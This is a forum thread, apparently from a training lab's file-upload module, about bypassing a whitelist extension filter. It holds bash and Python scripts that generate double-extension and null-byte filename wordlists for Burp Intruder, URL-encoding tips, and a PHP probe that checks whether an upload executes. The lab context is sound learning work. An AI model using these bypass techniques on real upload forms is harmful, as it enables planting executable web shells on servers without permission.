FILE UPLOAD ATTACKS - Whitelist Filters

I'm stuck here. I got a lot of success responses like "1.php\x00.png", "1.php/.jpg", but I can't access it. What should I do? Could anyone give me a push :face_exhaling:

2 Likes

Same here … and I got the flag after a lot of tries. Here are some tips that helped me solve it.
1- Create a list that combines both blacklist extensions with whitelist characters to bypass the filter, then use the Intruder:

#!/bin/bash
# Build a fuzzing wordlist: every PHP-style extension combined with a
# filter-bypass character, placed before or after the allowed ".jpg".
exts=('.php' '.php3' '.php4' '.php5' '.php7' '.php8' '.pht' '.phar' '.phpt' '.pgif' '.phtml' '.phtm')
# Bypass characters as posted; '...' is three plain dots (the original had a single Unicode ellipsis character)
for char in '%20' '%0a' '%00' '%0d0a' '/' '.\\' '.' '...' ':'; do
    for ext in "${exts[@]}"; do
        echo "shell$char$ext.jpg" >> wordlist.txt   # char before the PHP extension
        echo "shell$ext$char.jpg" >> wordlist.txt   # char between the two extensions
        echo "shell.jpg$char$ext" >> wordlist.txt   # allowed extension first
        echo "shell.jpg$ext$char" >> wordlist.txt   # trailing char
    done
done

Search for those that give you a successful download, then you need to try those that succeeded and can be executed (NOT ALL OF THEM WILL).

Use curl to test the links; browsers will give you the error "file can't be displayed because it has a mistake". Some characters that are used to bypass whitelist filtering should be URL-encoded when you request it, so if it is %20 you make it %2520, and so on.
Hope this helps you.

As people have said before on here, don't waste time with special characters. Focus on extensions and modify the script accordingly. You can check the allowed file extensions by inspecting the page first, to inform you on how to modify the script.

#!/bin/bash
# Extensions only: each PHP extension placed before and after each allowed image extension
for ext in '.php' '.phps' '.phar' '.phtml'; do
    for img in '.jpg' '.png' '.jpeg'; do
        echo "shell$ext$img" >> wordlist1.txt   # e.g. shell.php.jpg
        echo "shell$img$ext" >> wordlist1.txt   # e.g. shell.jpg.php
    done
done

2 Likes
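Both bash scripts above only generate the wordlist; the testing step (upload each candidate, request it with the bypass characters percent-encoded, and confirm the file is actually interpreted rather than merely stored) is still done by hand. The Python below is an added example, not code from either post or from the course: it generalises the two generators into one function covering both the character-plus-extension list and the extensions-only list, percent-encodes a stored filename for the follow-up request (the %20 to %2520 point above), and tells a served-as-text response apart from an executed one. The upload directory /uploads, the base name shell and the probe marker are assumptions.

```python
#!/usr/bin/env python3
"""Generate whitelist-bypass filenames, encode them for the follow-up request,
and decide whether a fetched upload was executed (added example, not course code)."""
from urllib.parse import quote

# Candidate server-side extensions (union of the two posts above) and the
# extensions the whitelist is expected to accept.
PHP_EXTS = ['.php', '.php3', '.php4', '.php5', '.php7', '.php8', '.phps',
            '.pht', '.phar', '.phpt', '.pgif', '.phtml', '.phtm']
IMG_EXTS = ['.jpg', '.jpeg', '.png']
# Characters that often confuse an extension check ('' = plain double extension,
# which is what the extensions-only script produces).
BYPASS_CHARS = ['', '%20', '%0a', '%00', '%0d%0a', '/', '.\\', '.', '...', ':']


def build_wordlist(base='shell', php_exts=PHP_EXTS, chars=BYPASS_CHARS, img_exts=IMG_EXTS):
    """Every PHP extension combined with every bypass character and allowed image
    extension, in the four positions used by the bash loops above. Duplicates
    (e.g. produced by the empty bypass character) are dropped; order is kept."""
    seen, names = set(), []
    for img in img_exts:
        for ext in php_exts:
            for c in chars:
                for name in (f'{base}{c}{ext}{img}',   # char before the PHP extension
                             f'{base}{ext}{c}{img}',   # char between the two extensions
                             f'{base}{img}{c}{ext}',   # allowed extension first
                             f'{base}{img}{ext}{c}'):  # trailing char
                    if name not in seen:
                        seen.add(name)
                        names.append(name)
    return names


def request_path(upload_dir, stored_name):
    """Percent-encode the stored filename once more so the web server receives the
    literal bytes that were saved: 'shell%20.php.jpg' -> 'shell%2520.php.jpg',
    '/' -> '%2F', a NUL byte -> '%00'. Letters, digits and dots stay as they are."""
    return upload_dir.rstrip('/') + '/' + quote(stored_name, safe='')


# Probe body: the marker only exists after PHP concatenates the two halves, so it
# can never appear in the raw source if the file is served back as plain text.
PROBE_MARKER = 'UPLOADED_PHP_RAN'
PROBE_PAYLOAD = "<?php echo 'UPLOADED' . '_PHP_RAN'; ?>"


def executed(response_body):
    """True when the fetched file was interpreted by PHP; False when it was served
    unchanged (source visible) or blocked (marker absent)."""
    return PROBE_MARKER in response_body and '<?php' not in response_body


if __name__ == '__main__':
    names = build_wordlist()
    with open('wordlist.txt', 'w') as fh:
        fh.write('\n'.join(names) + '\n')
    print(f'{len(names)} candidates written to wordlist.txt')
    for n in ('shell%20.php.jpg', 'shell.php/.jpg', 'shell.php\x00.jpg'):
        print(n, '->', request_path('/uploads', n))
    # Constructed responses: an executed upload versus one served as text.
    print(executed('UPLOADED_PHP_RAN'), executed(PROBE_PAYLOAD))   # True False
```

Run it to write wordlist.txt for the Intruder. For each candidate the upload accepted, fetch request_path(...) with curl and pass the body to executed(): True means the double extension was interpreted by PHP, while False with the source visible means the file was stored but served as text, which is the "success response but can't access it" situation the first post describes.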

Thanks :sweat_smile:

Hi, I'll give some hints: use the SecLists lists and you will see that it accepts .jpgs. You can use the extension from the previous challenge, because you will see that it gives a different error (phar). Result: shell.extension1.extension2

1 Like